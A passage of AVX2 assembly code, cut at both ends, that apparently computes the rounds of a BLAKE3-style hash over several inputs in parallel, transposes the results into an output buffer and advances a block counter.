vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xA0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x180]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x140]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xC0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1E0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
movzx eax, byte ptr [rbp+0x38]
jne 9b
mov rbx, qword ptr [rbp+0x50]
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
vmovdqa ymm0, ymmword ptr [rsp+0x220]
vpaddd ymm1, ymm0, ymmword ptr [rsp+0x240]
vmovdqa ymmword ptr [rsp+0x240], ymm1
vpxor ymm0, ymm0, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm0, ymm2
vmovdqa ymm0, ymmword ptr [rsp+0x260]
vpsubd ymm2, ymm0, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm2
add rdi, 64
add rbx, 256
